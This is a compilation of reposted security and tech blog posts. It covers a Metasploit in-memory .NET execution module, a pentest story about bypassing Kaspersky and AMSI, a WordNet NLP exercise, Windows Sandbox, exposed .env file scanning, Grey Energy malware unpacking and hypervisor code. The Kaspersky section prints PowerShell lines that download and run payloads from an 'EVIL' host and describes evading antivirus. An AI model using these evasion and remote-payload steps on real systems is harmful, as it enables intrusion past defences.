Execute assembly via Meterpreter session

( Original text by B4rtik )


Windows to run a PE file relies on reading the header. The PE header describes how it should be loaded in memory, which dependencies has and where is the entry point.
And what about .Net Assembly? The entry point is somewhere in the IL code. Direct execution of the assembly using the entry points in the intermediate code would cause an error.
This is because the intermediate code should not be executed first but the runtime will load the intermediate code and execute it.

Hosting CLR

In previous versions of Windows, execution is passed to an entry point where the boot code is located. The startup code, is a native code and uses an unmanaged CLR API to start the .NET runtime within the current process and launch the real program that is the IL code. This could be a good strategy to achieve the result. The final aim is: to run the assemply directly in memory, then the dll must have the assembly some where in memory, any command line parameters and a reference to the memory area that contains them.

Execute Assembly

So I need to create a post-exploitation module that performs the following steps:

  1. Spawn a process to host CLR (meterpreter)
  2. Reflectively Load HostCLR dll (meterpreter)
  3. Copy the assembly into the spawned process memory area (meterpreter)
  4. Copy the parameters into the spawned process memory area (meterpreter)
  5. Read assembly and parameters (dll)
  6. Execute the assembly (dll)

To start the Host process, metasploit provides Process.execute which has the following signature:

Process.execute (path, arguments = nil, opts = nil)

The interesting part is the ops parameter:

  1. Hidden
  2. Channelized
  3. Suspended
  4. InMemory

By setting Channelized to true, I can read the assembly output for free with the call


Once the Host process is created, Metasploit provides some functions for interacting with the memory of a remote process:

  1. inject_dll_into_process
  2. memory.allocate
  3. memory.write

The inject_dll_into_process function copies binary passed as an argument to a read-write-exec memory area and returns its address and an offset of the dll’s entry point.

exploit_mem, offset = inject_dll_into_process (process, library_path)

The memory.allocate function allocates memory by setting the required protection mode. In this case
I will write the parameters and the assembly in the allocated memory area, for none of these two elements I need the memory to be executable so I will set RW.

I decided to organize the memory area dedicated to parameters and assemblies as follows:

1024 bytes for the parameters
1M for the assembly

assembly_mem = process.memory.allocate (1025024, PAGE_READWRITE)

The third method allows to write data to a specified memory address.

process.memory.write (assembly_mem, params + File.read (exe_path))

Now I have the memory address of dll, the offset to the entry point, the memory address fo both the parameters and the assembly to be executed.
Considering the function

Thread.create (entry, parameter = nil, suspended = false)

I can use the memory address of dll plus the offset as a value for the entry parameter and the address the parameter and assembly memory area as the parameter parameter value.

process.thread.create (exploit_mem + offset, assembly_mem)

This results in a call to the entry point and an LPVOID pointer as input parameter.

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)

It’s all I need to recover the parameters to be passed to the assembly and the assembly itself.

ReadProcessMemory(GetCurrentProcess(), lpPayload, allData, RAW_ASSEMBLY_LENGTH + RAW_AGRS_LENGTH, &readed);

About the assemblies to be executed, it is important to note that the signature of the Main method must match with the parameters that have been set in the module, for example:

If the property ARGUMENTS is set to «antani sblinda destra» the main method should be «static void main (string [] args)»
If the property ARGUMENTS is set to «» the main method should be «static void main ()»

Chaining with SharpGen

A few days ago I read a blog post from @cobb_io where he presented an interesting tool for inline compilation of .net assemblies. By default execute-assembly module looks for assemblies in $(metasploit-framework-home)/data/execute-assembly but it is also possible to change this behavior by setting the property ASSEMBLYPATH for example by pointing it to the SharpGen Output folder in this way I can compile the assemblies and execute them directly with the module.

Source code



Bypassing Kaspersky Endpoint Security 11

( Original text by 0xc0ffee )


During a recent engagement, I was given a Windows tablet with no (pentest) tools installed and was asked to test its security and test how far I could go by compromising it. I had my own laptop but I was not allowed to directly connect to the internal network with it. However, I could use it as a C2 if I were to successfully compromise the tablet. Long story short, obtaining the initial shell was more difficult than owning the network due to the antivirus(es) that were required to bypass.


  1. Fully patched Windows 10 running on the tablet
  2. Up-to-date Kaspersky Endpoint Security 11 (KES11) on the tablet
  3. Google Chrome running a kiosk/PoS mode on the tablet
  4. Powershell Empire listener on the C2


So, I’m in Chrome’s kiosk/PoS mode on the tablet and every Windows shortcut is blocked such as WIN+R, ALT+TAB, CTRL+P, ALT+SPACE, etc. More on that here: Kiosk/POS Breakout Keys in Windows

However, the CTRL+N shortcut to open a new page was not blocked, bingo! We got a new page and Internet access, awesome. I went to the URL bar and quickly used the file:// scheme to download and open cmd.exe:

Instead of rushing straight into the terminal that just popped, I tried to open the Windows Explorer to have GUI access to files and shares by clicking Open file location on the downloaded file. Aaaaand, the action was denied, probably by a GPO.

Back to the terminal:

  1. I enumerated the files and shares and found nothing interesting.
  2. Ran wmic product get name, version to enumerate the installed softwares and associated versions.
  3. Ran wmic qfe get to list the hotfixes.
  4. Ran net user my_user /domain (yes, my_user was domain-joined to simulate an internal attack)
  5. Ran whoami /priv to list my privileges.

Got nothing very interesting exploit-wise that would give me a quick win. I was a domain-joined user with no administrative privileges and had many restrictive GPOs applied to the groups I belonged to. AV wise, Kaspersky Endpoint Security version was installed and so did Windows Defender.

Fail, fail, fail and succeed

One of my goals was to prove I could bypass the AV by injecting an Empire implant and moving on from there. As this test was not a red team and was time-constrained, I did not replicate the tablet’s environment to perform my tests. So, I started by downloading the Empire Powershell launcher through an encrypted channel with Powershell’s Invoke-Expression: IEX (New-Object Net.Webclient).downloadstring("https://EVIL/hello_there") and that would get detected, not by the AV, but by the firewall that was presumably performing SSL inspection! So, I needed a payload that could atleast get through the firewall before getting executed in memory. To spare you some time, I spent a full day failing over and over, getting either detected by the firewall or the AV, making the sysadmins very happy but also tired of getting alerts.

Compression and memory patching make a good pair

I knew Windows Defender was installed on the tablet and was leaving KES11 take control of most of the anti malware scanning. However, I learned the hard way that KES11 was making use of AMSI’s detection of script-based attacks. In fact, on their website, they mention the use of the AMSI technology, but only on the Kaspersky Security for Windows Serverpage:

Support for AMSI interfaces. Use of AMSI technology, which is integrated in Microsoft Windows, has enabled the improvement of the mechanism for intercepting script launches on the server. The stability of the Script Monitoring task is improved, the application’s influence on the environment is reduced when intercepting scripts and blocking them if threats are detected, and the task scope is significantly expanded – now the Script Monitoring component works not only with scripts in JS and VBS files, but also PS1 files. The functionality is available when the Script Monitoring component is installed on servers running Microsoft Windows Server 2016 or newer.

A colleague of mine recently shared an excellent blog post on how to bypass/disable the Anti Malware Scan Interface (AMSI) without elevated privileges by patching it in memory with a DLL : Bypass AMSI and Execute ANY malicious powershell code

With that in mind, we first need to bypass traffic inspection, remember? Invoke-Obfuscation comes to rescue. Compressing the Empire payload a few times was enough to get around it.

First, we grab the base64 part of our launcher.bat file generated by Empire, decode it and send it over to Invoke-Obfuscation. To do so, we run set SCRIPTBLOCK our_empire_base64decoded_payload:

Next, we run COMPRESS\1 a couple of times to compress our payload:

I then successfully downloaded the file to load it in memory with IEX. But now that the traffic inspection was bypassed, the AV was blocking the execution of the payload (no surprise).

What I learned during this gig was that KES11’s heuristics or signatured-based detections were first firing on my payload before AMSI even had a chance to inspect the script. I had to compress the payload exactly 4 times before it could bypass the AV and then get detected by AMSI:

All that’s left to do is disable AMSI and we’re good to go. I hosted the following code on a web server and downloaded it on the tablet with IEX:

function Bypass-AMSI
    if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMSI").Type) {
        Write-Output "DLL has been reflected";

Source: Bypass AMSI and Execute ANY malicious powershell code

IEX (New-Object Net.Webclient).downloadstring("https://EVIL/amsi") then Bypass-AMSI.

Successful execution

Now that the payload is compressed 4 times and AMSI is disabled, we download the payload and execute it in memory:

IEX (New-Object Net.Webclient).downloadstring("https://EVIL/compressed4.txt")

In the screenshot above, we can see that compressing the payload up to 3 times gets detected by KES11. The 4th time, the payload gets through the AV and since AMSI is disabled, we get successful execution:


Natural Language Processing: Measuring Semantic Relatedness

( Original text by Sandipan )

Long title: Measuring Semantic Relatedness using the Distance and the Shortest Common Ancestor and Outcast Detection with Wordnet Digraph in Python

The following problem appeared as an assignment in the Algorithm Course (COS 226) at Princeton University taught by Prof. Sedgewick.  The description of the problem is taken from the assignment itself. However, in the assignment, the implementation is supposed to be in java, in this article a python implementation will be described instead. Instead of using nltk, this implementation is going to be from scratch.

The Problem

  • WordNet is a semantic lexicon for the English language that computational linguists and cognitive scientists use extensively. For example, WordNet was a key component in IBM’s Jeopardy-playing Watson computer system.
  • WordNet groups words into sets of synonyms called synsets. For example, { AND circuitAND gate } is a synset that represent a logical gate that fires only when all of its inputs fire.
  • WordNet also describes semantic relationships between synsets. One such relationship is the is-a relationship, which connects a hyponym (more specific synset) to a hypernym (more general synset). For example, the synset gatelogic gate } is a hypernym of { AND circuitAND gate } because an AND gate is a kind of logic gate.
  • The WordNet digraph. The first task is to build the WordNet digraph: each vertex v is an integer that represents a synset, and each directed edge v→w represents that w is a hypernym of v.
  • The WordNet digraph is a rooted DAG: it is acyclic and has one vertex—the root— that is an ancestor of every other vertex.
  • However, it is not necessarily a tree because a synset can have more than one hypernym. A small subgraph of the WordNet digraph appears below.

The WordNet input file formats

The following two data files will be used to create the WordNet digraph. The files are in comma-separated values (CSV) format: each line contains a sequence of fields, separated by commas.

  • List of synsets: The file synsets.txt contains all noun synsets in WordNet, one per line. Line i of the file (counting from 0) contains the information for synset i.
    • The first field is the synset id, which is always the integer i;
    • the second field is the synonym set (or synset); and
    • the third field is its dictionary definition (or gloss), which is not relevant to this assignment.For example, line 36 means that the synset { AND_circuitAND_gate } has an id number of 36 and its gloss is a circuit in a computer that fires only when all of its inputs fire. The individual nouns that constitute a synset are separated by spaces. If a noun contains more than one word, the underscore character connects the words (and not the space character).
  • List of hypernyms: The file hypernyms.txt contains the hypernym relationships. Line i of the file (counting from 0) contains the hypernyms of synset i.
    • The first field is the synset id, which is always the integer i;
    • subsequent fields are the id numbers of the synset’s hypernyms.For example, line 36 means that synset 36 (AND_circuit AND_Gate) has 42338 (gate logic_gate) as its only hypernym. Line 34 means that synset 34 (AIDS acquired_immune_deficiency_syndrome) has two hypernyms: 47569 (immunodeficiency) and 56099 (infectious_disease).

The WordNet data type 

Implement an immutable data type WordNet with the following API:

  • The Wordnet Digraph contains 76066 nodes and 84087 edges, it’s very difficult to visualize the entire graph at once, hence small subgraphs will be displayed as and when required relevant to the context of the examples later.
  • The sca() and the distance() between two nodes v and w are implemented using bfs (bread first search) starting from the two nodes separately and combining the distances computed.

Performance requirements 

  • The data type must use space linear in the input size (size of synsets and hypernyms files).
  • The constructor must take time linearithmic (or better) in the input size.
  • The method isNoun() must run in time logarithmic (or better) in the number of nouns.
  • The methods distance() and sca() must make exactly one call to the length() and ancestor() methods in ShortestCommonAncestor, respectively.

The Shortest Common Ancestor

  • An ancestral path between two vertices v and w in a rooted DAG is a directed pathfrom v to a common ancestor x, together with a directed path from w to the same ancestor x.
  • shortest ancestral path is an ancestral path of minimum total length.
  • We refer to the common ancestor in a shortest ancestral path as a shortest common ancestor.
  • Note that a shortest common ancestor always exists because the root is an ancestor of every vertex. Note also that an ancestral path is a path, but not a directed path.
  • The following animation shows how the shortest common ancestor node 1 for thenodes 3 and 10  for the following rooted DAG is foundat distance 4 with bfs, along with the ancestral path 3-1-5-9-10. 
  • We generalize the notion of shortest common ancestor to subsets of vertices. A shortest ancestral path of two subsets of vertices A and B is a shortest ancestral path over all pairs of vertices v and w, with v in A and w in B.
  • The figure (digraph25.txt) below shows an example in which, for two subsets, red and blue, we have computed several (but not all) ancestral paths, including the shortest one.
    Shortest common ancestor data type Implement an immutable data type ShortestCommonAncestor with the following API:

Basic performance requirements 

The data type must use space proportional to E + V, where E and V are the number of edges and vertices in the digraph, respectively. All methods and the constructor must take time proportional to EV (or better).

Measuring the semantic relatedness of two nouns

Semantic relatedness refers to the degree to which two concepts are related. Measuring semantic relatedness is a challenging problem. For example, let’s consider George W. Bushand John F. Kennedy (two U.S. presidents) to be more closely related than George W. Bush and chimpanzee (two primates). It might not be clear whether George W. Bush and Eric Arthur Blair are more related than two arbitrary people. However, both George W. Bush and Eric Arthur Blair (a.k.a. George Orwell) are famous communicators and, therefore, closely related.

Let’s define the semantic relatedness of two WordNet nouns x and y as follows:

  • A = set of synsets in which x appears
  • B = set of synsets in which y appears
  • distance(x, y) = length of shortest ancestral path of subsets A and B
  • sca(x, y) = a shortest common ancestor of subsets A and B

This is the notion of distance that we need to use to implement the distance() and sca() methods in the WordNet data type.


Finding semantic relatedness for some example nouns with the shortest common ancestor and the distance method implemented

apple and potato (distance 5 in the Wordnet Digraph, as shown below)


As can be seen, the noun entity is the root of the Wordnet DAG.

beer and diaper (distance 13 in the Wordnet Digraph)


beer and milk (distance 4 in the Wordnet Digraph, with SCA as drink synset), as expected since they are more semantically closer to each other.


bread and butter (distance 3 in the Wordnet Digraph, as shown below)


cancer and AIDS (distance 6 in the Wordnet Digraph, with SCA as disease as shown below, bfs computed distances and the target distance between the nouns are also shown)


car and vehicle (distance 2 in the Wordnet Digraph, with SCA as vehicle as shown below)


cat and dog (distance 4 in the Wordnet Digraph, with SCA as carnivore as shown below)


cat and milk (distance 7 in the Wordnet Digraph, with SCA as substance as shown below, here cat is identified as Arabian tea)


Einstein and Newton (distance 2 in the Wordnet Digraph, with SCA as physicist as shown below)


Leibnitz and Newton (distance 2 in the Wordnet Digraph, with SCA as mathematician)


Gandhi and Mandela (distance 2 in the Wordnet Digraph, with SCA as national_leader synset)


laptop and internet (distance 11 in the Wordnet Digraph, with SCA as instrumentation synset)

school and office (distance 5 in the Wordnet Digraph, with SCA as construction synset as shown below)


bed and table (distance 3 in the Wordnet Digraph, with SCA as furniture synset as shown below)

Tagore and Einstein (distance 4 in the Wordnet Digraph, with SCA as intellectual synset as shown below)


Tagore and Gandhi (distance 8 in the Wordnet Digraph, with SCA as person synset as shown below)


Tagore and Shelley (distance 2 in the Wordnet Digraph, with SCA as author as shown below)


text and mining (distance 12 in the Wordnet Digraph, with SCA as abstraction synset as shown below)


milk and water (distance 3 in the Wordnet Digraph, with SCA as food,as shown below)

Outcast detection

Given a list of WordNet nouns x1, x2, …, xn, which noun is the least related to the others? To identify an outcast, compute the sum of the distances between each noun and every other one:

di   =   distance(xix1)   +   distance(xix2)   +   …   +   distance(xixn)

and return a noun xt for which dt is maximum. Note that distance(xixi) = 0, so it will not contribute to the sum.

Implement an immutable data type Outcast with the following API:




As expected, potato is the outcast  in the list of the nouns shown below (a noun with maximum distance from the rest of the nouns, all of which except potato are fruits, but potato is not). It can be seen from the Wordnet Distance heatmap from the next plot, as well as the sum of distance plot from the plot following the next one.

Again, as expected, table is the outcast  in the list of the nouns shown below (a noun with maximum distance from the rest of the nouns, all of which except table are mammals, but table is not). It can be seen from the Wordnet Distance heatmap from the next plot, as well as the sum of distance plot from the plot following the next one.


Finally, as expected, bed is the outcast  in the list of the nouns shown below (a noun with maximum distance from the rest of the nouns, all of which except bed are drinks, but bed is not). It can be seen from the Wordnet Distance heatmap from the next plot, as well as the sum of distance plot from the plot following the next one.


Microsoft unveils Windows Sandbox: Run any app in a disposable virtual machine

( Original text by PETER BRIGHT )

A few months ago, Microsoft let slip a forthcoming Windows 10 feature that was, at the time, called InPrivate Desktop: a lightweight virtual machine for running untrusted applications in an isolated environment. That feature has now been officially announced with a new name, Windows Sandbox.

Windows 10 already uses virtual machines to increase isolation between certain components and protect the operating system. These VMs have been used in a few different ways. Since its initial release, for example, suitably configured systems have used a small virtual machine running alongside the main operating system to host portions of LSASS. LSASS is a critical Windows subsystem that, among other things, knows various secrets, such as password hashes, encryption keys, and Kerberos tickets. Here, the VM is used to protect LSASS from hacking tools such that even if the base operating system is compromised, these critical secrets might be kept safe.Ars Technica

In the other direction, Microsoft added the ability to run Edge tabs within a virtual machine to reduce the risk of compromise when visiting a hostile website. The goal here is the opposite of the LSASS virtual machine—it’s designed to stop anything nasty from breaking out of the virtual machine and contaminating the main operating system, rather than preventing an already contaminated main operating system from breaking into the virtual machine.

Windows Sandbox is similar to the Edge virtual machine but designed for arbitrary applications. Running software in a virtual machine and then integrating that software into the main operating system is not new—VMware has done this on Windows for two decades now—but Windows Sandbox is using a number of techniques to reduce the overhead of the virtual machine while also maximizing the performance of software running within the VM, without compromising the isolation it offers.

The sandbox depends on operating system files residing in the host.
Enlarge / The sandbox depends on operating system files residing in the host.Microsoft

Traditional virtual machines have their own operating system installation stored on a virtual disk image, and that operating system must be updated and maintained separately from the host operating system. The disk image used by Windows Sandbox, by contrast, shares the majority of its files with the host operating system; it contains a small amount of mutable data, the rest being immutable references to host OS files. This means that it’s always running the same version of Windows as the host and that, as the host is updated and patched, the sandbox OS is likewise updated and patched.

Sharing is used for memory, too; operating system executables and libraries loaded within the VM use the same physical memory as those same executables and libraries loaded into the host OS.

That sharing of the host's operating system files even occurs when the files are loaded into memory.
Enlarge / That sharing of the host’s operating system files even occurs when the files are loaded into memory.Microsoft

Standard virtual machines running a complete operating system include their own process scheduler that carves up processor time between all the running threads and processes. For regular VMs, this scheduler is opaque; the host just knows that the guest OS is running, and it has no insight into the processors and threads within that guest. The sandbox virtual machine is different; its processes and threads are directly exposed to the host OS’ scheduler, and they are scheduled just like any other threads on the machine. This means that if the sandbox has a low priority thread, it can be displaced by a higher priority thread from the host. The result is that the host is generally more responsive, and the sandbox behaves like a regular application, not a black-box virtual machine.

On top of this, video cards with WDDM 2.5 drivers can offer hardware-accelerated graphics to software running within the sandbox. With older drivers, the sandbox will run with the kind of software-emulated graphics that are typical of virtual machines.

Taken together, Windows Sandbox combines elements of virtual machines and containers. The security boundary between the sandbox and the host operating system is a hardware-enforced boundary, as is the case with virtual machines, and the sandbox has virtualized hardware much like a VM. At the same time, other aspects—such as sharing executables both on-disk and in-memory with the host as well as running an identical operating system version as the host—use technology from Windows Containers.

At least for now, the Sandbox appears to be entirely ephemeral. It gets destroyed and reset whenever it’s closed, so no changes can persist between runs. The Edge virtual machines worked similarly in their first incarnation; in subsequent releases, Microsoft added support for transferring files from the virtual machine to the host so that they could be stored persistently. We’d expect a similar kind of evolution for the Sandbox.

Windows Sandbox will be available in Insider builds of Windows 10 Pro and Enterprise starting with build 18305. At the time of writing, that build hasn’t shipped to insiders, but we expect it to be coming soon.

Publicly accessible .ENV files

( Original text by BinaryEdge )

Deployment is something a lot of companies still struggle with. We talked about the issue with Kubernetes being deployed insecurely a few weeks ago in a blogpost and how the kubernetes pods are being hijacked to mine for cryptocurrency.

This week we look at something different but still related to deployments and exposing things to public that should not be.

One tweet from @svblxyz (whom we would also like to thank for all the help given to us on reviewing this post and giving tips on things to add) showed us an interesting google dork which made us wonder, what does this look like for IP adresses vs domain/services focused (as google search is).View image on Twitter

View image on Twitter



Don’t put your .env files in the web-server directory https://www.google.com/search?q=db_password+filetype%3Aenv …2,7829:15 PM — Sep 26, 20181,950 people are talking about thisTwitter Ads info and privacy

So we launched a scan using our distributed platform, as simple as:

> curl https://api.binaryedge.io/v1/tasks -d '{
      "description": "HTTP Worldscan .env",
      "type": "scan",
      "options": [{
        "targets": ["XXXX"],
        "ports": [{
            "modules": ["http"],
            "port": "80",
            "config": { "http_path": "/.env" }
      }' -H 'X-Token:XXXXXX'

After this we started getting the results and of course multiple issues can be identified on these scans:

  • Bad Deployments — The .ENV files being accessible is something that shouldn’t happen — there are companies exposing this type of file fully readable with no authentication.
  • Weak credentials — Lots of services with a username/password combo using weak passwords.

Credentials and Tokens

Lots different types of Service Tokens were found:

  • AWS — 38 tokens
  • Mangopay — 9 tokens
  • Stripe — 89 tokens
  • Pusher — 1600 Tokens

Other tokens found include:

  • PlugandPlay
  • Paypal
  • Mailchimp
  • Facebook
  • PhantomJS
  • Mailgun
  • Twitter
  • JWT
  • Google
  • WeChat
  • Shopify
  • Nexmo.
  • Bitly
  • Braintree
  • Twilio
  • Recaptcha
  • Ucloud
  • Firebase
  • Mandrill
  • Slack
  • Sentry.io
  • Shopzcoin

Many of these systems involve financial records/ payments.

But we also found access configurations to Databases, which potentially contain customer data, such as:

  • DB_PASSWORD keys: 1161
  • REDIS_PASSWORD keys: 801
  • MySQL credentials: 946 (username/password combos).

Looking at the passwords being used the top 3 we see they all consist of weak passwords:

1 — secret — 93
2 — root — 33
3 — adminadmin — 24

Other weak passwords found are:

  • password
  • test123
  • foobar

When exposed tokens go super bad…


Something that is also very dangerous is situations like the CVE-2018-15133 where if the APP_KEY is leaked for the Laravel app, allows an attacker to execute commands on the machine where the Laravel instance is running.

And our scan found: 300 APP_KEY Tokens related to Laravel.

One important note to be taken into account, we looked only at port 80 internet wide for our scan. The exposure on this can easily be much higher as other web apps will surely be exposing more .env files!

Unpacking Grey Energy malware (Service Application DLL)

( Original text by D3xt3r )

Recently I stumbled upon malware sample which was part of Grey Energy malware campaign targeting Ukraine energy infrastructure. I ran the hash of the file on virutotal and many of the antiviruses tagged it Grey Energy and I tried to do a little more internet research but didn’t find and analysis on it. As there was no post on this sample so I decided to write one.
In the post you will learn the following:

  1. How to debug Windows Service Application DLL
  2. Learn how to use a EBFE debugging technique
  3. Unpacking a DLL binary
  4. How to dump an unpacked in-memory executable

Identifying the Malware

Using some basic static analysis tool you can know that it’s a 64-bit Windows DLL.

Since it’s a DLL there we need to see the export table. There was only one function that was exported which is ServiceMain. This is the method is usually exported by Windows Service Application DLL. This is the function which is invoked when a request is made to the Windows Service Application.

Checking the Import section you can see the below DLL been imported. But as we see the further analysis, not all the DLL which are imported are in use.

Brief Introduction To Windows Service Application

If you know already know about Windows Services then I would advise you to skip this section. I will describe all the necessary stuff about Windows Service from malware authors perspective, but if you are interested to know more about it then you can refer to links in the reference section at the end of this post.

What is a Windows Service?

Windows Service Application is to create long-running background application which you can start automatically when the system boot/reboot and it doesn’t have any user interface. Services can be put in the various state like start, stop, paused, resume and restarted, all this is managed by Windows Service Controller(services.exe). These features make it ideal for use as malware which does all its working in the background and its also long running starts on reboot. Actual use cases of Services are like Web Server service, logging machine performance metric like CPU, RAM etc. Service executable can be a DLL program with a defined entry point.

A service may be written to run as either a stand-alone process or as a part of the Service Control Manager’s(svchost.exe) process (which creates a thread per service, and the service is allowed to create more threads). If the service runs in SC, the SC creates the thread for a service then loads its DLL, and calls the Service entry points to move the service through its states (first start, then eventually stop). Since creating a thread from the svchost.exe process(a system service) giving it system privileges which can be dangerous, but you can run the DLL in the specific security context of the user account that can be different from logged-on user.

Service Application requires the following items:

To create a Service DLL you need to satisfy specific requirement which is as follows :

  1. Main Entry point: this is required to register your service by calling StartServiceCtrlDispatcherthis will be the DLL entry point.
  2. Service Entry point: which is ServiceMain in the DLL export entry, task to this function is as following tasks:
    1. Initialize any necessary items which we deferred from the DLL Entry Point.
      Register the service control handler which will handle Service Stop, Pause, Continue, Shutdown, etc control commands.
    2. Set Service Status to SERVICE_PENDING than to SERVICE_RUNNING. Set status to SERVICE_STOPPED on any errors and on exit.
    3. Perform startup tasks. Like creating threads/events/mutex/IPCs/etc.
  3. Service Control Handler: The Service Control Handler was registered in your ServiceMain Entry point. Each service must have a handler to handle control requests from the SCM. This handler will be called in the context of the SCM and will hold the SCM until it returns from the handler. Service Handler is called on various events like start, stop, paused etc which is passed as the parameter to the handler function.

Basic Static Analysis

We start with doing static analysis on the DllEntry point this might be the first function which might get executed even before ServiceMain. Below is the disassembly of the DllEntry point.

Looking at the disassembly further there was some memory allocation and manipulating of that memory. There was another interesting function which is found was at address 0x2c0202bc, this function was called after allocation of memory which seems to be like a decryptor function, or at least preparing for so decryption. Below is the disassembly of this function.

As there are a couple of XOR operations whose value is picked from register rsp+0x68 and after some manipulation data is written to [rbx+rsi*2] translate to the same address. We can verify this in dynamic analysis. I am at this point little suspicious that the executable is packed as not many functions were recognized by both IDA and radare2 analysis.

Let us have look at the disassembly of the ServiceMain.

These instruction doesn’t seem to make any sense. This further confirms our doubt of packed executable. We can use radare2 entropy calculation function to check the entropy if each segment in the execute. If there is any segment with high entropy then it means that section holds the encrypted data. We can use radare2 iS entropy command to calculate the entropy of each segment, below is the result of the command.

As you can clearly see that .text segment has very high entropy compared to other segments. This confirms our suspicious of packed executable. In the next sections, we will try to setups debugging environment for Service Application as it is not as straight forward as other windows application and extract the unpacked executable using dynamic analysis.

How to debug a Service Application DLL

If this would have been a normal DLL we could just used Immunity debugger to do debugging but Service Application DLL is different as they have to register themselves and declare their state as running within first few seconds of execution, and also before running the main entry point the Service Control Manager(SCM) should be aware that the Service is going to run and the DLL runs only in the context of the SCM.

So the challenge is that we cannot get hold of the DLL entry point with ad debugger. We could overcome this limitation if we could manage to pause the execution of the DLL entry point when the SCM run the DLL.

After doing some research I came across a technique called EBFE, you can read more about on this link. In this technique, we insert an infinite loop at the point we want to insert the breakpoint, once the thread executes this instruction it puts it in an infinite loop. EBFE is a jump instruction code which points to itself, this will put the executing thread in an infinite loop and then we all the time in the world to attach the debugger to the process and start debugging the process.

Next question is how will we know which subprocess spawned by SCM should we attach the debugger to? It’s actually very simple, once the CPU executes the infinite loop instruction the CPU consumption value will rise to very high-value something like 90-100%. We can use process explorer one of the System Internal tools to get the process ID of the process.

As you can see in the image above once the CPU executes EBFE instruction it goes in an infinite loop which increases the CPU consumption to 95-100% which is the indicator that our process is ready to be attached.

Now that we have figured out how to attach the debugger to _Service Application _, next thing is we have to place this instruction at a point which will get executed which is the entry point of the DLL. There are two points of interest at which we are can place EBFE are, ServiceMain(Service entry point) and DllEntry (DLL entry point). We will place this EBFE instruction on both of these functions. Before replacing the two-byte instruction you will have to take note of the original two bytes which you are replacing. Once the hit the infinite loop we will replace it with the original bytes and continue debugging.

Dynamically unpacking the packed code

Let us start with analyzing DllEntry point since out of those two functions only this function had some sensible code.

First, the memory is allocated for the size of the original executable, the way it allocates the memory is something weird, it specifies the base address of memory block it wants to allocate, if it fails then it iterates from 100000h at the interval of 10000h tries to allocate the memory. We will have to not down this address as the unpacked executable will be on this address.

then it changes the memory permission of the allocated memory and copies each segment (.text, .rdata, ) to newly allocated memory.

then it patches the current DLL entry point with the DllEntry point function in unpacked code. Before patching the memory address it changes the memory permission to writable then restore it back to Read and Execute.

It then iterates the Import Address Table(IAT) of the unpacked DLL and it loads the DLL present in the IAT and resolves the imported functions and patches it in the table.

this is the stage at with code is unpacked and the IAT is resolved next the code jump to the original DllEntry point for execution.

Dumping the unpacked code

The memory address which we noted earlier in the address at which the executable is unpacked as you can see in the dump below.

We will use Scylla plugin which built-in in X64-dbg to dump the executable. You will have to specify the base address of the executable and the size of memory you want to use to recover the PE which you can see from the memory panel next to the address column and size of the debugger which is 23000 in our case and click the dump PE to save the executable file.

Unpacked Binary

Unpacked binary basic information is as shown below

Import section of the unpacked binary

Some more of the import section which shows binary uses HTTP for communication with the C&C

We can see the registering of the service in ServiceMain function by calling RegisterServiceCtrlHandleWand SetServiceStatus, that means we can be sure it was indeed as Service Application.


We managed to unpack the Service Application DLL, this packer was specially designed DLLs was we observed the unpacking of the binary as then patching of the DllEntry point to the original code. It was not a special anti-debug technique used in unpacking which made it very trivial which good to learn for a beginner. We also learnt how to dump in-memory binary along the way.


  1. Creating Windows Service Application in C++
  2. Windows Service Application MSDN
  3. Debugging Remote Thread with EBFE technique

Hypervisor From Scratch – Part 5: Setting up VMCS & Running Guest Code

Original text by Sinaei )


Hello and welcome back to the fifth part of the “Hypervisor From Scratch” tutorial series. Today we will be configuring our previously allocated Virtual Machine Control Structure (VMCS) and in the last, we execute VMLAUNCH and enter to our hardware-virtualized world! Before reading the rest of this part, you have to read the previous parts as they are really dependent.

The full source code of this tutorial is available on GitHub :


Most of this topic derived from Chapter 24 – (VIRTUAL MACHINE CONTROL STRUCTURES) & Chapter 26 – (VM ENTRIES) available at Intel 64 and IA-32 architectures software developer’s manual combined volumes 3. Of course, for more information, you can read the manual as well.

Table of contents

  • Introduction
  • Table of contents
  • VMX Instructions
  • Enhancing VM State Structure
  • Preparing to launch VM
  • VMX Configurations
  • Saving a return point
  • Returning to the previous state
  • VMX Controls
    • VM-Execution Controls
    • VM-entry Control Bits
    • VM-exit Control Bits
    • PIN-Based Execution Control
    • Interruptibility State
  • Configuring VMCS
    • Gathering Machine state for VMCS
    • Setting up VMCS
    • Checking VMCS Layout
  • VM-Exit Handler
    • Resume to next instruction
  • Let’s Test it!
  • Conclusion
  • References

This part is highly inspired from Hypervisor For Beginner and some of methods are exactly like what implemented in that project.

VMX Instructions

In part 3, we implemented VMXOFF function now let’s implement other VMX instructions function. I also make some changes in calling VMXON and VMPTRLD functions to make it more modular.


VMPTRST stores the current-VMCS pointer into a specified memory address. The operand of this instruction is always 64 bits and it’s always a location in memory.

The following function is the implementation of VMPTRST:

12345678910UINT64 VMPTRST(){    PHYSICAL_ADDRESS vmcspa;    vmcspa.QuadPart = 0;    __vmx_vmptrst((unsigned __int64 *)&vmcspa);     DbgPrint(«[*] VMPTRST %llx\n», vmcspa);     return 0;}


This instruction applies to the VMCS which VMCS region resides at the physical address contained in the instruction operand. The instruction ensures that VMCS data for that VMCS (some of these data may be currently maintained on the processor) are copied to the VMCS region in memory. It also initializes some parts of the VMCS region (for example, it sets the launch state of that VMCS to clear).

123456789101112131415BOOLEAN Clear_VMCS_State(IN PVirtualMachineState vmState) {     // Clear the state of the VMCS to inactive    int status = __vmx_vmclear(&vmState->VMCS_REGION);     DbgPrint(«[*] VMCS VMCLAEAR Status is : %d\n», status);    if (status)    {        // Otherwise terminate the VMX        DbgPrint(«[*] VMCS failed to clear with status %d\n», status);        __vmx_off();        return FALSE;    }    return TRUE;}


It marks the current-VMCS pointer valid and loads it with the physical address in the instruction operand. The instruction fails if its operand is not properly aligned, sets unsupported physical-address bits, or is equal to the VMXON pointer. In addition, the instruction fails if the 32 bits in memory referenced by the operand do not match the VMCS revision identifier supported by this processor.

12345678910BOOLEAN Load_VMCS(IN PVirtualMachineState vmState) {     int status = __vmx_vmptrld(&vmState->VMCS_REGION);    if (status)    {        DbgPrint(«[*] VMCS failed with status %d\n», status);        return FALSE;    }    return TRUE;}

In order to implement VMRESUME you need to know about some VMCS fields so the implementation of VMRESUME is after we implement VMLAUNCH. (Later in this topic)

Enhancing VM State Structure

As I told you in earlier parts, we need a structure to save the state of our virtual machine in each core separately. The following structure is used in the newest version of our hypervisor, each field will be described in the rest of this topic.

